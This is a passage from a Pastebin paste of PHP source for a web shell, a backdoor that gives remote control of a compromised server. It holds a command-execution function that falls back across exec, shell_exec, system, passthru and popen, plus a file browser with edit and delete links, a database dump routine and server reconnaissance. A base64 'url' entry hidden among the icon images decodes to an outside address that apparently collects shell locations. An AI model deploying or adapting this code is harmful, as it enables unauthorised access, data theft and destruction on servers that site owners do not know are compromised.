Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- ini_set('memory_limit', '1000M');
- $_nexpwd = "p4ssw0rdZ";
- //if ($_GET['str'] != $_nexpwd) {die();}
- $images = array(
- "change"=>
- "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAANESURBVHjaYjxx5tZzXh4OHgYk8O3nb4YfP/8zfHhwjkH3aTHD97+WP8+sP7Pw7d173UxMDC+Q1QIEEAsfH6eAhoo0B7Lgr9//GH7+Z2L4+KafQcrgMQPTX2keaVa1onU9924wMjLMZmBEqAUIIJb///7/YUADzKxMDP+fvWQQZN/EwPQaKHDxBMOni0xfPrJwX//99y8D43+EWoAAYmHAAkAWML9ZxsDB8JiB4T0DGJ/nMOb+kJHX9vXzu3hGBsb7rGxsDKwsbAwAAYTVgL+fPjMwf1jEwPwbyPnOxPDsKSPDV4swRnYedttH9587cXJxzb1x5hrD7ZuXGQACCKsBDB/3MzD/ucjA8ION4f/LvwwvpK0YZF2CGb7dvs5w6fvnn2/fvGTYs2MNUOEfBoAAYsKm///DyQysvJwMDF84GN5/5GP4ouHHICQjxcDM8JeBhYWV4cqlK0BV/4CYjQEggDBc8PfFCQZmjltAzcCY/cTA8I5HjUHQIZSB8/9PBj4eXoYjBw8x3LtzHqiSlQ0UYQABhOoCYAj/ezaPgYkDKPwTaPMHHob3Mp4MglLSDCzABMDIzMjw5vVLTpBuIBYBYm6AAGKBRelPUNS8uMjAwv6QgfGPIJDDzvDqOzuDaFAsw68vHxh+//rJ8OnjJwYmRiZgmmGEuZwXIIDgXvgH8tLfH0CGNAMDBy/Dl+dPGd4IWzNw/GNm+Pn6DVAjI8M/oAtBQQQLKlAoAgQQE3Lc//nNCExELgx//7gyXLwmyPBb1YHhDzCd/f33n4GFlQWohhGkC6wRiD8A8VuAAIK7gJWZgeHhy28Ml/YdYZDm5GZgtM1i4FbSZPjz4xvYMmYWJgYubm4GJiamr0Bn/oZgJgaAAGJCdtOP738Ynt96zsBq7M8grGsODOMfDGzAaBMU5GMQExMHuoKZwcbe8begkCwDIyM4EhgAAoiFCQjBSReINY3NGVQMTBmYBYSANv9m+C3Ay8DKzgb0+38GNjZmBmZmFgYuLk6m8KhYhlu3bjLcv3OdASCAWO7eefhh1Yo1PCAnMjIDYwcUWH9+AZ3FDHTZX4b/IE8Dw4CJiZHhAzAWgGHx68vXLwwKCooMqqrqDAABBgD54A4xrMo1ZAAAAABJRU5ErkJggg==",
- "delete" =>
- "R0lGODlhEAAQANUAAMczNfRxdPRzdPNydPNzddgqL+AsNN8sM8cpMOY2PuU2PsUgK+UwOfJVYPRja/NjavNja/Nka8UYJ8YZKMUZJ8YgLPJUYMUTJfE/UvA/UfJIWPFIWNRldN+cqMpdSc5uXspXRspYRslYRtWIfMlQQ9ymoMlHPslHP8hHP8c9OeBhW/WBfcc9OuNST/WAfvSAfuPExP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAADEALAAAAAAQABAAAAZ8wJhwSCwaj0eYZ1QceWBEWKgVYgpHohYIKiyRXCvSp/QhvcIl4ghFEKhMqkHgZCVyWBHIw/FIcZAACg0NFgkASDEIDBsaGgwISBwVGJSUC39FHBOUBRIFGBkUmEIdF6AXHB0cphkXHUMwFwaoQ6sHF1xCsaNCq7mIwMExQQA7",
- "folder"=>
- "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
- "small_unk"=>
- "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
- "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
- "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
- "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
- "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
- "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
- "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
- "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
- "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
- "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
- "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
- "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
- "yAsokBkQADs=",
- "url"=>
- "aHR0cDovL24wdHcuYWx0ZXJ2aXN0YS5vcmcvYy5waHA/dHlwZT1zaGVsbHMmYz0=",
- "ext_mp3"=>
- "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
- "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
- "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
- "ext_exe"=>
- "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
- "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
- "xhIAOw==",
- "ext_html"=>
- "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/".
- "kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+".
- "Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
- "ext_jpg"=>
- "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACjUlEQVQ4jW2STW8jRRCGn+rp+UhGdmKPN5YhwYFIDuxHDrn4Hu6RyE/YC8oPyB+BAzlyzoUjSAgJrbRI5IKEEmmFYKNI3ll2bLPxbpZxnJ5uDjNxshJ96Gqpup56u94W5xwHBwfB/v7+l0op5ZwTgP+JjmoVReH29va+Pj09LTTAysrK4pM/069+fDYA5vcAEEBEQAQl5fnz3ipJknwDlIAoilQYhjSaDQCUSFksglRFSlQZlRAvLrC1taWBKw0QBIFarsVsfBggVVsBBEFEiHwPB7TiiLdXhsai0Ol0NEC5ae2tJ8uEdcXo3ZT82jA1BeIcjcgnDjSeEpYDC7zlzfCCVqt1CwjDUP387Iwf/niJrz18z8PXHrXI53F/lSQYUw8sSoAaXDbvkaV/+3cBnhcv8EGyPB9eLfR41KnRqQc0wgb59B++H/3KLxenrC/cZz1a9eYA3/dVgdBY8HjYjnjQDqjH7xjkf/Fk+Irn+Ut+ev0b6dUIgMfRZwRBcAtQSqn+x00+/WjKi2nG8b9jppezylKfuu7yxb1u5YrwqPaAy1dvbgHOOWnVm7Ro8olz3Pkzt/+hKpbK4qfqqZoDynyZMMaQZRmTyYSiKOh2u2RZhjGGOI5ZW1vDOZkXqAqgbujX19cMBgPOzs4wxnBycsJ4PKbdbmOMwSEU1mKtZQ7wPE8rpd6TubS0xPb2Nv1+nzzPybKM8/NzCmNxtmA2m8ndIXo3T0jTlF6vR7PZpHKInZ0drIWNjR5QoLXH8fHx5e7ubqlAa61vOm9ubpIkyXtqnCtnA5YoihgOh78fHh6+nivI8/wiTdNvnXMWsM45KyLWOWedwxbWFcbMbBSGs8lkkh0dHX03Go2mAP8BZNgCDYdm9o4AAAAASUVORK5CYII=",
- "ext_php"=>
- "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
- "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
- "ext_pl"=>
- "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
- "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
- "ext_swf"=>
- "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
- "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
- "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
- "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
- "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
- "ext_tar"=>
- "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
- "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
- "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
- "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
- "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
- "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
- "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
- "u4tLAgEAOw==",
- "ext_txt"=>
- "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsTAAALEwEAmpwYAAAABGdBTUEAALGOfPtRkwAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAACm0lEQVR42mLs7+//z0ABAAhAcRzbAAjDABD8gpXYy6O4ZxKWQCxATUuB4+A4glD8ST/9iAjr3vDobIdzeaNEjn8pCVYcqzHq2JPcNTmXGVXlE0AsMJPMVZkZ/jMwM9hosDD8A7rpHyMTw5/P7xi+Pn/CwCwizcDExcPw99dvhr9AyT9//8JdABBAcAMEuJmgLCgNNOTP60kMDDycDJ8fyjCwKZkxcEqrMPz9/ZPh/3+4NgaAAGLB5i9QoPx+d4mB8VcvA+sHBgbmB44MP6WNGZj+/Gf4B8L//jGwcUDUAgQQE1YD/gGJL/MYWBm/Mfy7y8Lwm1uPgUNei+H/n19A2/8z/EXyAkAAsWCz/e/HWwxMv3cyMHxWYPjySZSByTyCgZHhH9hmkGaQITAAEECYBgAN//9hMQMrMxvDv7dCDD9l/Ri45XUZ/v36BgzAfwyMjIwMzMzMcPUAAQT3AshUkMv/frnDwMx6AxgIqgzfviowsOr6g0QhipmYgC74h2IhQADBXfD9+w+g6awMTJ/2MLCyCDD8+8jI8J1bg4FbQpnhHzDkfwLTAUjNjx+/GTg4WBn4+PjA+gACCOEFYLz/+/aMgeXnKwYGdiWGr58/MfxXcmP48vU7w/cvnxn+/PnD8AuYDkDh8Pv3L7g2gACCG8AE9Bcojv8ymTL8//ST4c3fT0CDRBj+ffgI9vefP38ZLl06C9cIYwMEEMIAoP++//rHcPvQJQZhRT0GBkVHBiZgfLKwMAOdzA5UwQ5WFx4eDqZBybiwsFAYIIAQBjAyMLBx8jIIKhsy8GmZA6MNmLCBgpyc7AysrKxA/3+D2w7VzAUKOoAAghvAwszEwCIqxaAKxNgAFxc3smYWWNQABBALTJBYgKwZBAACDAAKWftvHUTAkgAAAABJRU5ErkJggg==",
- );
- if ($_GET[act] == "img") {
- header("Content-type: image/gif");
- header("Cache-control: public");
- header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- header("Cache-control: max-age=".(60*60*24*7));
- header("Last-Modified: ".date("r",filemtime(__FILE__)));
- $image = $images[$_GET['img']];
- echo base64_decode($image);
- die();
- }
- // Function for table dump
- function getperms ($perms) { // <--- thx to php.net
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- function datadump ($table) { // <--- thx to mrwebmaster for function
- # Creo la variabile $result
- $result .= "# Dump of $table \n";
- $result .= "# Dump DATE : " . date("d-M-Y") ."\n\n";
- # Conto i campi presenti nella tabella
- $query = mysql_query("select * from $table");
- $num_fields = @mysql_num_fields($query);
- # Conto il numero di righe presenti nella tabella
- $numrow = mysql_num_rows($query);
- # Passo con un ciclo for tutte le righe della tabella
- for ($i =0; $i<$numrow; $i++)
- {
- $row = mysql_fetch_row($query);
- # Ricreo la tipica sintassi di un comune Dump
- $result .= "INSERT INTO ".$table." VALUES(";
- # Con un secondo ciclo for stampo i valori di tutti i campi
- # trovati in ogni riga
- for($j=0; $j<$num_fields; $j++) {
- $row[$j] = addslashes($row[$j]);
- $row[$j] = ereg_replace("\n","\\n",$row[$j]);
- if (isset($row[$j])) $result .= "\"$row[$j]\"" ; else $result .= "\"\"";
- if ($j<($num_fields-1)) $result .= ",";
- }
- # Chiudo l'istruzione INSERT
- $result .= ");\n";
- }
- return $result . "\n\n\n";
- }
- // using which THX TO R57
- function whicha($pr)
- {
- $path = exa("which $pr");
- if(!empty($path)) { return $path; } else { return $pr; }
- }
- // executing command THX TO R57
- function exa($cfe)
- {
- $res = '';
- if (!empty($cfe))
- {
- if(function_exists('exec'))
- {
- @exec($cfe,$res);
- $res = join("\n",$res);
- }
- elseif(function_exists('shell_exec'))
- {
- $res = @shell_exec($cfe);
- }
- elseif(function_exists('system'))
- {
- @ob_start();
- @system($cfe);
- $res = @ob_get_contents();
- @ob_end_clean();
- }
- elseif(function_exists('passthru'))
- {
- @ob_start();
- @passthru($cfe);
- $res = @ob_get_contents();
- @ob_end_clean();
- }
- elseif(@is_resource($f = @popen($cfe,"r")))
- {
- $res = "";
- while(!@feof($f)) { $res .= @fread($f,1024); }
- @pclose($f);
- }
- }
- return $res;
- }
- // function pari
- function pari($num) {
- return ($num%2 == 0) ? TRUE : FALSE;
- }
- // Getting Directory..
- if ($_POST['dir'] == "") {
- if ($_COOKIE['dir'] == "") {
- $dir=realpath(".");
- }
- else
- {
- $d = str_replace("\\",DIRECTORY_SEPARATOR, $_COOKIE['dir']);
- $d = str_replace("\\\\","\\", $_COOKIE['dir']);
- $dir = $d;
- }
- }
- else
- {
- $dir = str_replace("\\",DIRECTORY_SEPARATOR,$_POST['dir']);
- $d = str_replace("\\\\","\\", $_POST['dir']);
- setcookie("dir",$dir);
- }
- if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
- // Getting something...
- $safemode_off_msg = "<font color=green>Safe Mode: OFF</font><br />";
- $safemode_on_msg = "<font color=red>Safe Mode: ON</font><br />";
- $gpc_off_msg = "<font color=green>Magic Quotes: OFF</font><br />";
- $gpc_on_msg = "<font color=red>Magic Quotes: ON</font><br />";
- $auf_on_msg = "<font color=green>Allow URL Fopen: ON</font><br />";
- $auf_off_msg = "<font color=red>Allow URL Fopen: OFF</font><br />";
- $reglobals_on_msg = "<font color=green>Register Globals: ON</font><br />";
- $reglobals_off_msg = stripslashes("<font color=red>Register Globals: OFF</font><br />");
- $uname = php_uname();
- (ini_get("safe_mode") == 0) ? $safemode = $safemode_off_msg : $safemode = $safemode_on_msg;
- (ini_get("magic_quotes_gpc") == 0) ? $gpc = $gpc_off_msg : $gpc = $gpc_on_msg;
- (ini_get("allow_url_fopen") == 1) ? $auf = $auf_on_msg : $auf = $auf_off_msg;
- (ini_get("register_globals") == 1) ? $reglobals = $reglobals_on_msg : $reglobals = $reglobals_off_msg;
- $freespace = disk_free_space($dir);
- $totalspace = disk_total_space($dir);
- $percentfree = round(($freespace*100)/$totalspace);
- $percentbusy = 100-$percentfree;
- $freespace = intval((($freespace/1024)/1024)/1024);
- $totalspace = intval((($totalspace/1024)/1024)/1024);
- $freespace .= " GB";
- $totalspace .= " GB";
- $current_user = "Who are you? ".get_current_user()."<br />";
- $uid = "Uid: ".getmyuid()." Gid: ".getmygid()."<br />";
- if ($_POST['mode'] == "") $_POST['mode'] = "ls";
- if ($_POST['mode'] == "ls") {
- //Directory listing
- $output .= "<br /><br />Directory listing [ {$dir} ]<br /><div align=left>";
- $output .= '<table width="100%" border="0" cellspacing="0" cellpadding="0">
- <tr>
- <td style="border-bottom:#FFFFFF 1px solid;" width="10%">perms</td>
- <td style="border-bottom:#FFFFFF 1px solid;" width="5%"> </td>
- <td style="border-bottom:#FFFFFF 1px solid;" width="50%">name</td>
- <td style="border-bottom:#FFFFFF 1px solid;" width="20%">owner/group</td>
- <td style="border-bottom:#FFFFFF 1px solid;" width="15%">actions</td>
- </tr>';
- $opendir = opendir($dir)or print("<font color=red>Can't open directory</font>");
- $i = 1;
- while ($file=readdir($opendir)){
- $color = "#333333";
- $icons = array(
- "txt" => "ext_txt",
- "ini" => "ext_txt",
- "sql" => "ext_txt",
- "php" => "ext_php",
- "pl" => "ext_pl",
- "html" => "ext_html", "htm" => "ext_html",
- "mp3" => "ext_mp3",
- "swf" => "ext_swf",
- "rar" => "ext_tar",
- "zip" => "ext_tar",
- "tar" => "ext_tar",
- "gz" => "ext_tar",
- "bz" => "ext_tar",
- "exe" => "ext_exe",
- "jpg" => "ext_jpg", "png" => "ext_jpg", "gif" => "ext_jpg");
- if ($dir == realpath(".")) {
- if (is_file($file)){
- $ext = array_pop(explode(".",$file));
- if (array_key_exists($ext, $icons)) $icon = $icons[$ext];
- else $icon = "small_unk";
- if (function_exists("posix_getpwuid")) {
- $uid = posix_getpwuid(fileowner($file));
- $gr00p = posix_getgrgid(filegroup($file));
- $owner = $uid[name]."/".$gr00p[name]; }
- else
- {
- $owner = fileowner($file)."/".filegroup($file);
- }
- $perms = fileperms($file);
- $info = getperms($perms);
- if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
- elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
- else $info = "<font color=green>{$info}</font>";
- $output.= ' <tr style="background-color:'.$color.';">
- <td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?act=img&img='.$icon.'" /></td>
- <td style="border-bottom:#FFFFFF 1px solid;">'.$file.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value=\''.$file.'\';document.fedit.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value=\''.$file.'\';document.delfile.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=delete" border=0 /></a></td>
- </tr>';
- }
- else
- {
- if (function_exists("posix_getpwuid")) {
- $uid = posix_getpwuid(fileowner($file));
- $gr00p = posix_getgrgid(filegroup($file));
- $owner = $uid[name]."/".$gr00p[name]; }
- else
- {
- $owner = fileowner($file)."/".filegroup($file);
- }
- $perms = fileperms($file);
- $info = getperms($perms);
- if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
- elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
- else $info = "<font color=green>{$info}</font>";
- $output.= ' <tr style="background-color:'.$color.';">
- <td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=folder" /></td>';
- $output .= '<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">'.$file.'</a></td>
- <td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">Go</a></td>
- </tr>';
- }
- }
- else
- {
- chdir($dir);
- if (is_file($file)){
- $ext = array_pop(explode(".",$file));
- if (array_key_exists($ext, $icons)) $icon = $icons[$ext];
- else $icon = "small_unk";
- if (function_exists("posix_getpwuid")) {
- $uid = posix_getpwuid(fileowner($file));
- $gr00p = posix_getgrgid(filegroup($file));
- $owner = $uid[name]."/".$gr00p[name]; }
- else
- {
- $owner = fileowner($file)."/".filegroup($file);
- }
- $perms = fileperms($file);
- $info = getperms($perms);
- if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
- elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
- else $info = "<font color=green>{$info}</font>";
- $output.= ' <tr style="background-color:'.$color.';">
- <td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img='.$icon.'" /></td>
- <td style="border-bottom:#FFFFFF 1px solid;">'.$file.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value=\''.$file.'\';document.fedit.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value=\''.$file.'\';document.delfile.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=delete" border=0 /></a></td>
- </tr>';
- }
- else
- {
- if (function_exists("posix_getpwuid")) {
- $uid = posix_getpwuid(fileowner($file));
- $gr00p = posix_getgrgid(filegroup($file));
- $owner = $uid[name]."/".$gr00p[name]; }
- else
- {
- $owner = fileowner($file)."/".filegroup($file);
- }
